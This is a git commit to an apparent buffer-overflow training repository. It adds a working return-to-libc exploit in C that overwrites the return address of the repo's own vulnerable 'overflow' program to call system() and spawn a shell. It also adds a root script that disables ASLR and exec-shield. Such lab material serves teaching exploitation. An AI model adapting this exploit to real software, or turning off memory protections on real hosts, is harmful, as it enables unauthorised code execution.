return-to-lib.c exploit example as request by a user

Signed-off-by: Toni Uhlig <matzeton@googlemail.com>

4 files changed, 93 insertions, 5 deletions

diff --git a/.gitignore b/.gitignore
index 6cdf807..33c8209 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,5 +1,7 @@
 *.swp
 *.o
+*.exe
+return-to-lib
 overflow
 overflow_x64
 overflow_tcp
diff --git a/disable_prot.sh b/disable_prot.sh
index e33fe14..712ca66 100755
--- a/disable_prot.sh
+++ b/disable_prot.sh
@@ -3,7 +3,7 @@
 if [ `id -u` -ne 0 ]; then
   echo "$0: This script should be run as root."
   echo "$0: Try to get root .."
-  su -l root -c "$(readlink -f $0)"
+  sudo "$(readlink -f $0)"
   exit $?
 fi
 
@@ -11,10 +11,10 @@ cat /proc/cpuinfo | grep -oq pae 2>/dev/null >/dev/null
 ret=$?
 if [ $ret -eq 0 ]; then
   echo "$0: PAE enabled system found."
-  echo "$0: Some exploits will not work!"
+  echo "$0: Some exploits may not work!"
 fi
 
 set -x
-sysctl -w kernel.randomize_va_space=0
-sysctl -w kernel.exec-shield=0
+sysctl -w kernel.randomize_va_space=0 2>/dev/null
+sysctl -w kernel.exec-shield=0 2>/dev/null
 
diff --git a/overflow.c b/overflow.c
index 1d9e4cf..07dc8ab 100644
--- a/overflow.c
+++ b/overflow.c
@@ -9,7 +9,6 @@
 #include <stdio.h>
 #include <string.h>
 
-/* 300 bytes buffer len + 4 bytes for overwrite return opcode */
 #define BUFLEN    300
 
 void
@@ -24,6 +23,10 @@ overflow(const char *src)
 int
 main(int argc, char **argv)
 {
+  /* force system() symbol import for return-to-lib.c exploitation */
+  void * system_fn = system;
+  (void)system_fn;
+
   if (argc > 1) {
       overflow(argv[1]);
   } else {
diff --git a/return-to-lib.c b/return-to-lib.c
new file mode 100644
index 0000000..3f0acba
--- /dev/null
+++ b/return-to-lib.c
@@ -0,0 +1,83 @@
+#include <libgen.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#define BUFLEN 300
+
+static void hexdump(void * buf, size_t siz)
+{
+    for (size_t i = 0; i < siz; ++i)
+    {
+        printf("0x%02X ", ((unsigned char *)buf)[i]);
+        if ((i+1) % 10 == 0) printf("\n");
+    }
+}
+
+static char *
+run_command_and_capture_output(char const * const cmd)
+{
+    FILE *fp;
+    char output[BUFSIZ];
+
+    fp = popen(cmd, "r");
+    if (fp == NULL) {
+        return NULL;
+    }
+    if (fgets(output, sizeof(output), fp) != NULL) {
+        return strdup(output);
+    }
+    pclose(fp);
+
+    return NULL;
+}
+
+int main(int argc, char ** argv)
+{
+    char * mydir;
+    char * system_fn_as_str;
+    size_t * system_fn = (size_t *)0xDEADC0DE;
+    char cmd_get_system_fn[BUFSIZ];
+    char path_to_overflow[BUFSIZ];
+    char exploit_buffer[BUFLEN + 4 /* saved ebp (stack frame of the calling fn) */
+                               + 4 /* return address -> address of system() */
+                               + 4 + 4 /* first argument for system() */];
+
+    if (argc != 1)
+    {
+        exit(1);
+    }
+    mydir = dirname(strdup(argv[0]));
+
+    snprintf(cmd_get_system_fn, sizeof(cmd_get_system_fn),
+             "nm %s/overflow | grep 'W system' | cut -d ' ' -f 1", mydir);
+    printf("Executing $(%s) to get address of system()\n", cmd_get_system_fn);
+    system_fn_as_str = run_command_and_capture_output(cmd_get_system_fn);
+    if (system_fn_as_str == NULL)
+    {
+        printf("Could not retrieve system() address.\n");
+        exit(1);
+    }
+    system_fn = (size_t *)strtoul(system_fn_as_str, NULL, 16);
+
+    snprintf(path_to_overflow, sizeof(path_to_overflow), "%s/%s",
+             mydir, "overflow");
+    printf("Exec......: %s\n"
+           "system()..: %p\n"
+           "env(SHELL): %p\n",
+           path_to_overflow, system_fn, getenv("SHELL"));
+
+    memset(exploit_buffer, 'A', sizeof(exploit_buffer));
+    *(size_t **)&exploit_buffer[BUFLEN + 4] = system_fn;
+    *(size_t **)&exploit_buffer[BUFLEN + 4 + 4 + 4] = (size_t *)(getenv("SHELL") + strlen("SHELL"));
+
+    printf("\nexploit buffer:\n");
+    hexdump(exploit_buffer, sizeof(exploit_buffer));
+    printf("\n\n");
+
+    printf("All set up, let's have some fun.\n"
+           "Executing %s with exploit buffer as argv[1]\n",
+           path_to_overflow);
+    execl(path_to_overflow, path_to_overflow, exploit_buffer, NULL);
+}